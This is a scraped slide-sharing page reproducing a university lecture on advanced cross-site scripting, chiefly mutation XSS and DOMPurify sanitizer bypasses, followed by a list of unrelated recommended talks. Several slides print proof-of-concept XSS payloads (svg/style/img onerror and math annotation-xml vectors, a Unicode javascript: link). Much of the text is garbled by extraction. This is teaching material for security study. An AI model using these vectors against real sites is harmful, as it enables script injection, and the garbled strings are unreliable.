we b b r o ws e r s e c u r i t y
play

We b & B r o ws e r S e c u r i t y D a y T - PowerPoint PPT Presentation

Jul 25, 2023 •270 likes •582 views

We b & B r o ws e r S e c u r i t y D a y T w o : A d v a n c e d X S S This is the day where we cover A lecture by Dr.-Ing. Mario Heiderich crazy stufg. Crazy. mario@cure53.de || mario.heiderich@rub.de O

  1. We b & B r o ws e r S e c u r i t y D a y T w o : A d v a n c e d X S S This is the day where we cover A lecture by Dr.-Ing. Mario Heiderich crazy stufg. Crazy. mario@cure53.de || mario.heiderich@rub.de

  2. O u r D e a r L e c t u r e r ● D r . - I n n g g . M a r i o H H e e i d d e e r r i c h ● E x - - R R e s e a a r r c h e r a a n n d n o w L e c t u r e r , R u h r - - U U n i B o c h u m ● P h D T h e s i s a b o u t C l i e n t S i d e S e c u r i t y a n d D e f e n s e ● F o u n d e r & D i r e c t o r o f C u r e 5 5 3 3 ● P e n t e s t - & S e c u r i t y - F i r m l o c a t e d i n B e r l i n ● S e c u r i t y , C o n s u l t i n g , Wo r k s h o p s , T r a i n i n g s ● A s k f o r a n i n t e r n s h i p i f t h e f o r c e i s s t r o n g w i t h y o u ● P P u u b l i s h e d A u t h o r a a n n d S p e a a k k e r ● S p e c i a l i z e d o n H T M L 5 , D O M a n d S V G S e c u r i t y ● J a v a S c r i p t , X S S a n d C l i e n t S i d e A t t a c k s ● M M a a i i n t a i n s D O M M P P u u r i f f y y ● A t o p n o t c h J S - o n l y S a n i t i z e r , a l s o , c o u p l e o f o t h e r p r o j e c t s ● C a a n n b e c o n t a a c c t e d d b u t p r e f e r s n o t t o b e ● ma r i o @c u r e 5 3 . d e ● ma r i o . h e i d e r i c h @r u b . d e

  3. A c t O n e A d d v v a a n n c e d d X X S S

  4. A n d , b e f o r e g e t s t a r t e d . L e t ' s s t t h h i i n n k k a a b o u t t S S e e l l f - X S S . A A n n d o o n n e e k k i n n d d o o f C C S R R F F . A n d h o w w e c a n a b u s e t h a t .

  5. [ . . . ]

  6. Mu t a t i o n s i n t h e D O M: mX S S ● T h i s a t t a c k i s b a s i c a l l y a n i g h t ma r e c o me t r u e . B r o w s e r s t u r n e d a g a i n s t w e b a p p s . ● I ma g i n e , t h e b r o w s e r t u r n s h a r ml e s s H T M L i n t o a d a n g e r o u s a t t a c k v e c t o r s . ● T h e s e r v e r w i l l a s s u me s a n e ma r k u p a n d n o r i s k ● T h i s i s s u e i n d e e d e x i s t s , fj r s t r e p o r t e d i n 2 0 0 6 ● „ B r o k e n P r i n t - P r e v i e w “ h t t p : / / i s . g d / f L V S c q ● S t r i n g - M u t a t i o n i n c e r t a i n D O M p r o p e r t i e s ● R e s u l t : µ X S S , mX S S o r “ M u t a t i o n X S S ” ● B a c k t h e n , a fg e c t e d a p p l i c a t i o n s a n d l i b r a r i e s : 2 + M i l l i o n l i b r a r i e s a c c o r d i n g t o G i t h u b ● Yay! ● 6 + v e c t o r c l a s s e s , a fg e c t w e b ma i l e r s , e v e r y o n e w i t h a R T E DEMO ● Y a h o o ! M a i l , O WA , H o t ma i l , S h a r e p o i n t , e t c . ● A n d D O M P u r i f y o f c o u r s e , ma s s i v e l y s o ● L e t t ' ' s h h a a v e e a a c c l o o s s e e e e r r l o o o o k a a t t t t h h i i s !

  7. O r , t o b e mo r e c l e a r ● A t t a c k e r s u b mi t s H T M L ● S e r v e r r e c e i v e s i t t o s a n i t i z e ● S a y s , t h a t l o o k s s a f e , a l l fj fj n e ● S e n d s i t b a c k t o b r o w s e r ● B r o w s e r r e c e i v e s H T M L ● R e n d e r s i t i n i t i a l l y , a l l fj fj n e ● S o me D O M l o g i c fj d d l e s w i t h i t ● B r o w s e r r e - r e n d e r s , H T M L mu t a t e s ● I n j e c t e d J a v a S c r i p t a c t i v a t e s a n d fj r e s

  8. N e w V a r i a t i o n s B o t h v e c t o r s i d e n t i fj e d a n d p u b l i s h e d b y G a r e t h H e y e s <%/z=%&gt&lt;p/&#111;nresize&#x3d;alert(1) &#111;nresize&#x3d;alert(1)//> <div='/x=&#39&gt&lt;iframe/ &#39&gt&lt;iframe/ onlo load= d=ale lert( t(1)& )&gt>

  10. O t h e r B r o ws e r s F i r e f o x c a n n o t b e t r u s t e d w i t h i n n e r H T M L a n d S V G <script> document.write('<svg><p><style><img src="</st style le><i <img g src rc=x x onerr on rror= r=ale lert( t(1)/ )//"> ">') </script> C h r o me c a n n o t b e t r u s t e d w i t h U n i c o d e ( s a d l y fj x e d i n C h r o me 6 2 ) <a href=&#x3 x3000 00;javascript:alert(1)>CLICK

  11. O t h e r B r o ws e r s C h r o me r e c e n t l y fj x e d a n o t h e r mX S S p r o b l e m <math><annotation-xml encoding="text/html"><xmp>&lt; &lt;/xmp>&lt; &lt;img src=x onerror=alert(1)></xmp></annotation- xml></math>

  14. C h e c k o u t t h e v i d e o ! h t t p s : / / i s . g d / o R N B L Z A n d a l l t h e c o d e ! h t t p s : / / i s . g d / S d P 0 S K

  15. B u t i t g e t s wo r s e ● A u t u mn 2 0 1 9 w a s mX S S s e a s o n . S a d l y f o r u s . ● D O M P u r i f y g o t h i t b y a g o o d d o z e n o f b y p a s s e s ● F � i r s t f o u n d b y a 3 P a r t y , M i c h a B e n t k o w s k i r d ● T h e r e s t t h e n f o u n d “ i n t e r n a l l y ” ● T h e r e w a s t w o r o o t c a u s e s ● A n i n t e r n a l s w i t c h i n d o c u me n t t y p e s c h a n g e s t h e p a r s e r t y p e ● A s u d d e n c h a n g e i n d o c u me n t s t r u c t u r e c h a n g e s t h e p a r s e r t y p e

  16. mX S S R o o t - C a u s e O n e ● A n i n t e r n a l s w i t c h i n d o c u me n t t y p e s c h a n g e s t h e p a r s e r t y p e ● T h e b r o w s e r t h i n k s i t ’ s X M L , t h e n t h i n k s i t ’ s H T M L ● O n c e t h a t “ r e c o n s i d e r a t i o n ” h a p p e n s , H T M L g e t s i n t e r p r e t e d d i fg e r e n t l y ● T h i s c a u s e s b y p a s s e s , e v e n a n d e s p e c i a l l y i n D O M s a n i t i z e r s l i k e D O M P u r i f y

  17. <svg></p><style> <a id="</style><img src=1 onerror=alert(1)>">

  18. <svg></p><style> <a id="</style><img src=1 onerror=alert(1)>">

  19. <svg><p></p><style> <a id="</style><img src=1 onerror=alert(1)>">

  20. mX S S R o o t - C a u s e T wo ● A s u d d e n c h a n g e i n d o c u me n t s t r u c t u r e c h a n g e s t h e p a r s e r t y p e ● T h e s w i t c h i s t r i g g e r e d b y f o r e x a mp l e e l e me n t r e mo v a l ● B r o w s e r t h i n k s X M L , e l e me n t g e t s r e mo v e d , b r o w s e r n o w t h i n k s H T M L ● A n d a s t h a t h a p p e n s , t h e H T M L g e t s i n t e r p r e t e d d i fg e r e n t l y

  21. <noembed><svg><b><style><b title='</style><img src=x onerror=alert(1)>'>

  22. <noembed><svg><b><style><b title='</style><img src=x onerror=alert(1)>'>

  23. This element we don’t want, let’s remove it. <noembed><svg><b><style><b title='</style><img src=x onerror=alert(1)>'>

  24. And boom, we force the parser into XML-mode because SVG. Harmless becomes harmful. removed <svg><b><style><b title='</style><img src=x onerror=alert(1)>'>

Download Presentation
Download Policy: The content available on the website is offered to you 'AS IS' for your personal information and use only. It cannot be commercialized, licensed, or distributed on other websites without prior consent from the author. To download a presentation, simply click this link. If you encounter any difficulties during the download process, it's possible that the publisher has removed the file from their server.

Recommend

Authoring Web-accessible STEM documents Volker Sorge Progressive Accessibility MathJax School

Authoring Web-accessible STEM documents Volker Sorge Progressive Accessibility MathJax School

Authoring Web-accessible STEM documents Volker Sorge Progressive Accessibility MathJax School of Computer Science Solutions Consortium University of Birmingham Birmingham, UK mathjax.org cs.bham.ac.uk progressiveaccess.com Empower 2018,

619 views • 35 slides
MOBILE HTML5 Max Firtman @firt mobile+web developer Wednesday, October 12, 11 who am I? mobile +

MOBILE HTML5 Max Firtman @firt mobile+web developer Wednesday, October 12, 11 who am I? mobile +

Oct, 10th, 2011 Aarhus, Denmark MOBILE HTML5 Max Firtman @firt mobile+web developer Wednesday, October 12, 11 who am I? mobile + web developer mobile x web.com blog @firt Wednesday, October 12, 11 where? Wednesday, October 12, 11 where?

2.18k views • 182 slides
Explanation in Natural Language of -terms Claudio Sacerdoti Coen

Explanation in Natural Language of -terms Claudio Sacerdoti Coen

Overview The -calculus as a (bad) Proof Format The -calculus as a (good) Proof Format Summary Explanation in Natural Language of -terms Claudio Sacerdoti Coen &lt;sacerdot@cs.unibo.it&gt; Project PCRI, CNRS, cole

852 views • 72 slides
Generating a Minimal Interval Arithmetic Based on GNU MPFR (in the context of the search for

Generating a Minimal Interval Arithmetic Based on GNU MPFR (in the context of the search for

Generating a Minimal Interval Arithmetic Based on GNU MPFR (in the context of the search for hard-to-round cases) Vincent LEFVRE Arnaire, INRIA Grenoble Rhne-Alpes / LIP, ENS-Lyon Dagstuhl Seminar 11371 Uncertainty modeling and

164 views • 12 slides
Relax NG with Son of ODD, or What the TEI did Next Lou Burnard and Sebastian Rahtz Oxford

Relax NG with Son of ODD, or What the TEI did Next Lou Burnard and Sebastian Rahtz Oxford

Relax NG with Son of ODD, or What the TEI did Next Lou Burnard and Sebastian Rahtz Oxford University Text Encoding Initiative Extreme Markup Languages , Montral, August 2004 Relax NG with Son of ODD, or What the TEI did Next 1 Topics

862 views • 36 slides
Overview of Kurzweil 3000 for Windows developing PARTNERSHIPS building CAPACITY supporting STUDENTS

Overview of Kurzweil 3000 for Windows developing PARTNERSHIPS building CAPACITY supporting STUDENTS

SET BC Training: Overview of Kurzweil 3000 Win 1 developing PARTNERSHIPS building CAPACITY supporting STUDENTS implementing TECHNOLOGY 2 SET BC 30 min Online Training Overview of Kurzweil 3000 for Windows developing

498 views • 14 slides
XML 1 CS380 What is XML? 2 XML: a &quot;skeleton&quot; for creating markup languages

XML 1 CS380 What is XML? 2 XML: a &quot;skeleton&quot; for creating markup languages

XML 1 CS380 What is XML? 2 XML: a &quot;skeleton&quot; for creating markup languages you already know it! syntax is identical to XHTML's: &lt;element attribute=&quot;value&quot;&gt;content&lt;/element&gt; languages written in

383 views • 21 slides
Bill McCoy Executive Director International Digital Publishing Forum (IDPF) IDPF mission:

Bill McCoy Executive Director International Digital Publishing Forum (IDPF) IDPF mission:

Enabling Smart Media for Digital Publishing in Education Bill McCoy Executive Director International Digital Publishing Forum (IDPF) IDPF mission: foster an open, global ecosystem for digital publishing Based on web standards ? ? ?

666 views • 37 slides
Program Languages with CTP Features ? Idea CTP tutoring On IS AC -experiments with

Program Languages with CTP Features ? Idea CTP tutoring On IS AC -experiments with

Programming with CTP ? Walther Neuper Issues from e-learning Program Languages with CTP Features ? Idea CTP tutoring On IS AC -experiments with Isabelle09 IS AC tutor demonstration CTP-based languages ? IS AC s language

1.03k views • 57 slides
Maven git clone https://github.com/jonananas/maven-examples.git Build automation Tools

Maven git clone https://github.com/jonananas/maven-examples.git Build automation Tools

Maven git clone https://github.com/jonananas/maven-examples.git Build automation Tools Automates braindraining repetitive work compiling testing creating artifacts Ensures automatic repeatable builds!

388 views • 9 slides
Software architecture School of Computer Science, University of Oviedo Lab. 05 Building

Software architecture School of Computer Science, University of Oviedo Lab. 05 Building

Software architecture Universidad of Oviedo Software architecture School of Computer Science, University of Oviedo Lab. 05 Building automation Maven, Gradle, npm, grunt , Dependency management Jose Emilio Labra Gayo Hugo Lebredo 2019-20

962 views • 44 slides
Project system APIs and Maven Project Type A case study on modular design Agenda Project

Project system APIs and Maven Project Type A case study on modular design Agenda Project

Project system APIs and Maven Project Type A case study on modular design Agenda Project system APIs design Maven project type Platform application built by Maven Project system overview Abstraction over a set of resources

336 views • 29 slides
Maven 2020/5/11 Apache Maven Build and manage Java project Structure and contents are

Maven 2020/5/11 Apache Maven Build and manage Java project Structure and contents are

Poly- mor- phism Abstra ction Class OOP Inheri -tance En- capsu- lation Kuan-Ting Lai Maven 2020/5/11 Apache Maven Build and manage Java project Structure and contents are declared in Project Object Model (POM) file

997 views • 21 slides
Day 2 Lab3: Word Count Example Introductions In this exercise we'll implement the obligatory

Day 2 Lab3: Word Count Example Introductions In this exercise we'll implement the obligatory

Day 2 Lab3: Word Count Example Introductions In this exercise we'll implement the obligatory streaming example used by almost every streaming tool. The example simply takes a string of words and count them. All the below directory references

449 views • 9 slides
Build Automation - A Brief Introduction to Maven CS480 Software Engineering Yu Sun, Ph.D.

Build Automation - A Brief Introduction to Maven CS480 Software Engineering Yu Sun, Ph.D.

Build Automation - A Brief Introduction to Maven CS480 Software Engineering Yu Sun, Ph.D. http://yusun.io yusun@cpp.edu Very Important in Practice Gateway to participate in real software development You cannot start coding without

529 views • 19 slides
C++ Binary Dependency Management with Gradle Hugh Greene &lt;hughg@tameter.org&gt; C++ Binary

C++ Binary Dependency Management with Gradle Hugh Greene &lt;hughg@tameter.org&gt; C++ Binary

C++ Binary Dependency Management with Gradle Hugh Greene &lt;hughg@tameter.org&gt; C++ Binary Dependency Management with Gradle Getting consistent versions of things needed to build your software and to use it 2 C++ Binary Dependency

218 views • 17 slides
CoAP The Web-based Application-layer Protocol for the Internet of Things Matthias Kovatsch

CoAP The Web-based Application-layer Protocol for the Internet of Things Matthias Kovatsch

Internet of Things and Smart Cities Ph.D. School 2014 &gt; COLLECT CoAP The Web-based Application-layer Protocol for the Internet of Things Matthias Kovatsch Follow the Slides http://goo.gl/anfy5w About the Speaker Matthias Kovatsch

1.86k views • 115 slides
Software Engineering and Architecture Build Management Afklaring Hvordan udnytter vi

Software Engineering and Architecture Build Management Afklaring Hvordan udnytter vi

Software Engineering and Architecture Build Management Afklaring Hvordan udnytter vi bedst auditoriet Mentimeter sprgsml Motivation Oracle/Sun provides Java SDK free of charge provides standard command line tools:

629 views • 21 slides
make Eric McCreath Overview In this lecture we will: introduce the idea of automatic build

make Eric McCreath Overview In this lecture we will: introduce the idea of automatic build

make Eric McCreath Overview In this lecture we will: introduce the idea of automatic build systems overview the make command and how it works learn about the basics of the format of a Makefile look at some Makefiles for Java projects, and

383 views • 13 slides
Incremental Analysis of Interference Among Aspects Interference Among Aspects Authors: Emilia

Incremental Analysis of Interference Among Aspects Interference Among Aspects Authors: Emilia

Incremental Analysis of Interference Among Aspects Interference Among Aspects Authors: Emilia Katz, Shmuel Katz Th T The Technion h i 1 Motivation Multiple aspects are often woven into the same p p system =&gt; Unintended

938 views • 42 slides
CPSC 102 Build Tools Z A IN R IZ V I What Are Build Tools? Automate the compiling of

CPSC 102 Build Tools Z A IN R IZ V I What Are Build Tools? Automate the compiling of

CPSC 102 Build Tools Z A IN R IZ V I What Are Build Tools? Automate the compiling of executable applications from source code. Why is this important? Compilation Order Computer Scientists are lazy 1 2 3 4 Specify the order in

481 views • 8 slides
Advanced Programming Lab 4 Collections and Streams A Collection is a group of individual

Advanced Programming Lab 4 Collections and Streams A Collection is a group of individual

Advanced Programming Lab 4 Collections and Streams A Collection is a group of individual objects (elements) represented as a single unit. A Stream is a sequence of elements supporting sequential and parallel aggregate operations.

266 views • 10 slides
Secure and efficient deep learning everywhere Octomizer Outline Who we are (recap) Deployment

Secure and efficient deep learning everywhere Octomizer Outline Who we are (recap) Deployment

Secure and efficient deep learning everywhere Octomizer Outline Who we are (recap) Deployment pain The vision The Octomizer: TVM for everyone 2 Simple, secure, and efficient Drive TVM adoption Expand the set of users who can deployment of

370 views • 14 slides
Hacking Maven how to add steroids on Maven di Massimiliano Dess InseHacking Maven Abstract

Hacking Maven how to add steroids on Maven di Massimiliano Dess InseHacking Maven Abstract

Hacking Maven how to add steroids on Maven di Massimiliano Dess InseHacking Maven Abstract 30 minutes to illustrate from 30000 ft the ideas applied to turn Maven from a static producer to a rich compiler enabled to reads objects

354 views • 22 slides

More recommend